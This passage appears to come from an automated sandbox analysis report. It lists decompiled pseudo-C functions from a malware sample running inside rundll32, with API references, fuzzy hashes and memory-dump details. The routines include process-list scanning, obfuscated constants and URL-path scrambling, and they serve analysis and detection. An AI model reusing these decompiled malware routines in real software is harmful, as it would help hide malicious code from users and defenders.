                                          								_t58 = E040816DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E04089D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E04089D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04088F1E
                                          • GetLastError.KERNEL32 ref: 04088F37
                                            • Part of subcall function 04089D3A: WaitForMultipleObjects.KERNEL32(00000002,0408AA33,00000000,0408AA33,?,?,?,0408AA33,0000EA60), ref: 04089D55
                                          • ResetEvent.KERNEL32(?), ref: 04088FB0
                                          • GetLastError.KERNEL32 ref: 04088FCB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: b1f1509ca5344e8b674503df6991f01157d92080d4c4cf67786beb4d88e895a4
                                          • Instruction ID: 6319e352f56f2f6cf389baba71d2b7359ae338ab256fe99fb43ba3dccc6f0b05
                                          • Opcode Fuzzy Hash: b1f1509ca5344e8b674503df6991f01157d92080d4c4cf67786beb4d88e895a4
                                          • Instruction Fuzzy Hash: 3431A272600604AFDB61BFA4CE44EAE77B9EF88364F14452CE591B7290EA70F941AB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E040872F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0x408d270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x408d2a4; // 0xbfa5a8
                                          				_t3 = _t8 + 0x408e836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E04086AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x408d2a8, 1, 0, _t30);
                                          					E0408147E(_t30);
                                          				}
                                          				_t12 =  *0x408d25c; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E040856A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E04081493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t19 =  *0x408d110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E04087827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 04086AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04082098,74666F53,00000000,?,0408D00C,?,?), ref: 04086B2D
                                            • Part of subcall function 04086AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04086B51
                                            • Part of subcall function 04086AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04086B59
                                          • CreateEventA.KERNEL32(0408D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0408555B,?,?,?), ref: 04087333
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,0408555B,00000000,00000000,?,00000000,?,0408555B,?,?,?), ref: 04087393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0408555B,?,?,?), ref: 040873C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0408555B,?,?,?), ref: 040873D9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 97c038fe1ceebe75dfbccb48b83d1d7d64134892459555a628d7edd432f9d569
                                          • Instruction ID: 7870164c69cb16f1e6cd48066df3912a80e01bb6c101ba728d18594d74f75ee3
                                          • Opcode Fuzzy Hash: 97c038fe1ceebe75dfbccb48b83d1d7d64134892459555a628d7edd432f9d569
                                          • Instruction Fuzzy Hash: 632125326003529BD7717E689E44A6B76E9EF84714B25063CFED1FB148DBA8EC018652
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E0408A1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0x408d140; // 0x408ad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E040858BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E0408147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E04089D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0408A208
                                          • SetEvent.KERNEL32(?), ref: 0408A218
                                          • GetLastError.KERNEL32 ref: 0408A2A1
                                            • Part of subcall function 04089D3A: WaitForMultipleObjects.KERNEL32(00000002,0408AA33,00000000,0408AA33,?,?,?,0408AA33,0000EA60), ref: 04089D55
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • GetLastError.KERNEL32(00000000), ref: 0408A2D6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 5be725225b17f60a6b61aee26584cc1e573bef2d0ca11a5f711d7e4350dffff9
                                          • Instruction ID: 59f59edd17a6316d463436d5f336417ac4b33791f11c4a7e9163327165c400fc
                                          • Opcode Fuzzy Hash: 5be725225b17f60a6b61aee26584cc1e573bef2d0ca11a5f711d7e4350dffff9
                                          • Instruction Fuzzy Hash: 43311EB5B00209EFDB30EFE9CA8499EB7F8EF08344F10496ED582B2541D735AA459F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E040854AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E04084F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E04085749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E04089138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x408d2a8, 1, 0,  *0x408d340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E04089575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E0408A642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E0408568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E040872F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}













                                          APIs
                                          • CreateEventA.KERNEL32(0408D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 040854FD
                                          • SetEvent.KERNEL32(00000000), ref: 0408550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04085515
                                          • CloseHandle.KERNEL32(00000000), ref: 0408551C
                                            • Part of subcall function 04089575: WaitForSingleObject.KERNEL32(00000000,?,?,?,0408553C,?,0408553C,?,?,?,?,?,0408553C,?), ref: 0408964F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 5674017c357b865f1865b78ff57c7d661ed76472863ad6585f704bcdd849da82
                                          • Instruction ID: 21fa9498928cdd59de03c7cf078a7bca1eec7ab7e13f015ca0c2ceeb497f8db9
                                          • Opcode Fuzzy Hash: 5674017c357b865f1865b78ff57c7d661ed76472863ad6585f704bcdd849da82
                                          • Instruction Fuzzy Hash: F7214572D00115BBDF10BFE4DE949EE77BAEF48358B05442DEAD2B7100E678B9418B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04084858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0x408d238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0x408d250; // 0xa5d54544
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x408d250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04084DBF,00000000,?,?,040852FE,?,04C895B0), ref: 04084863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0408487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04084DBF,00000000,?,?,040852FE,?,04C895B0), ref: 040848BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 040848E0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 515623b6b73030b1635d682d6dac460e8f3533dc2c885cd75fc61d7395270d76
                                          • Instruction ID: 9eb6cb6f79c054759a2d4ea011043336ef3c75677fd3e2acd83ce571fec0b7f8
                                          • Opcode Fuzzy Hash: 515623b6b73030b1635d682d6dac460e8f3533dc2c885cd75fc61d7395270d76
                                          • Instruction Fuzzy Hash: 1711C672A00159EFD714DE69DE84D9EBFFEDF90260B45027AF944AB290E7789E00C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E04086AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E04086F89(_t8, _t1);
                                          				_t16 = E040858BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E04089038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E040858BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E0408147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                            • Part of subcall function 04089038: wsprintfA.USER32 ref: 04089094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04082098,74666F53,00000000,?,0408D00C,?,?), ref: 04086B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04086B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04086B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 70cad3aac9dabc0012744550a1c4619fc997f5dde33547a99e7fa83c5362e7ee
                                          • Instruction ID: fc5f8bc69477936dc835b5cc7c5a15dbb78b62e48cb17b02e5b5f3cdd1767142
                                          • Opcode Fuzzy Hash: 70cad3aac9dabc0012744550a1c4619fc997f5dde33547a99e7fa83c5362e7ee
                                          • Instruction Fuzzy Hash: A801AC321001057BE7123AA49E48DEE3AACDF8439DF054529F9857A101D739D5458BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E040856A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x408d2a4; // 0xbfa5a8
                                          						_t2 = _t9 + 0x408ee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x408d0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 040856B2
                                          • Process32First.KERNEL32(00000000,?), ref: 040856C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 040856F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04085700
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: e9299cb41d246e50c93ec6bd3fed313347fab1cbbc77ecbf7318c082b454e672
                                          • Instruction ID: 32791d4ef9e0ea6c4fbb1d8f98172f7510ea04f1695dbcaefaf95f32565410c6
                                          • Opcode Fuzzy Hash: e9299cb41d246e50c93ec6bd3fed313347fab1cbbc77ecbf7318c082b454e672
                                          • Instruction Fuzzy Hash: 7FF0F672601124AAF720BA36AF08EDF76ACDF85344F000169E9C5F3080EA64E9568AA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0051179C() {
                                          				void* _t1;
                                          				unsigned int _t3;
                                          				void* _t4;
                                          				long _t5;
                                          				void* _t6;
                                          				intOrPtr _t10;
                                          				void* _t14;
                                          
                                          				_t10 =  *0x514130;
                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                          				 *0x51413c = _t1;
                                          				if(_t1 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t3 = GetVersion();
                                          				if(_t3 != 5) {
                                          					L4:
                                          					if(_t14 <= 0) {
                                          						_t4 = 0x32;
                                          						return _t4;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				} else {
                                          					if(_t3 >> 8 > 0) {
                                          						L5:
                                          						 *0x51412c = _t3;
                                          						_t5 = GetCurrentProcessId();
                                          						 *0x514128 = _t5;
                                          						 *0x514130 = _t10;
                                          						_t6 = OpenProcess(0x10047a, 0, _t5);
                                          						 *0x514124 = _t6;
                                          						if(_t6 == 0) {
                                          							 *0x514124 =  *0x514124 | 0xffffffff;
                                          						}
                                          						return 0;
                                          					} else {
                                          						_t14 = _t3 - _t3;
                                          						goto L4;
                                          					}
                                          				}
                                          			}











                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005111E0), ref: 005117AB
                                          • GetVersion.KERNEL32(?,005111E0), ref: 005117BA
                                          • GetCurrentProcessId.KERNEL32(?,005111E0), ref: 005117D6
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005111E0), ref: 005117EF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentEventOpenVersion
                                          • String ID:
                                          • API String ID: 845504543-0
                                          • Opcode ID: bec84d0f1c442d538b5244d6b6ccb5a775bfa16277e448cf2a17bdff447794bd
                                          • Instruction ID: 9863ed0e3e2d186267e05a81e302c55babce95977dddf5f8a9a7c6bb4dfe5842
                                          • Opcode Fuzzy Hash: bec84d0f1c442d538b5244d6b6ccb5a775bfa16277e448cf2a17bdff447794bd
                                          • Instruction Fuzzy Hash: BFF06D71980611BBEB109B69BC19BD43FA0A729722F20C166E641C61E4E36085C9EF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04087283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 04087291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 040872A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 040872B3
                                          • CloseHandle.KERNEL32(?), ref: 040872C5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 8ec190c09cd39fc6197e046101d2bea487173a89788e86e4ffeb62342c9cc042
                                          • Instruction ID: 0e39cfd5e148bf58316dc6bd46a9f3793287939dc390d969645c2d0a20e912b7
                                          • Opcode Fuzzy Hash: 8ec190c09cd39fc6197e046101d2bea487173a89788e86e4ffeb62342c9cc042
                                          • Instruction Fuzzy Hash: 26F0FEB1104308BFE310BF66DDC4C2BBBECEB9529CB21892EF582A2511D676A9154E71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0408A2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E040858BE(_t2);
                                          				if(_t12 != 0) {
                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04089AA8,00000000,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 0408A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 0408A31B
                                          • memset.NTDLL ref: 0408A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 9e4700ce08f9990edf51a3dc8748df282c42f48ba2889f8c16a4614c85ff9c0f
                                          • Instruction ID: f89ab952cb51dedd53a6833c6bcb7d2ac72c6dfcc328a00878a7da94031eb4c1
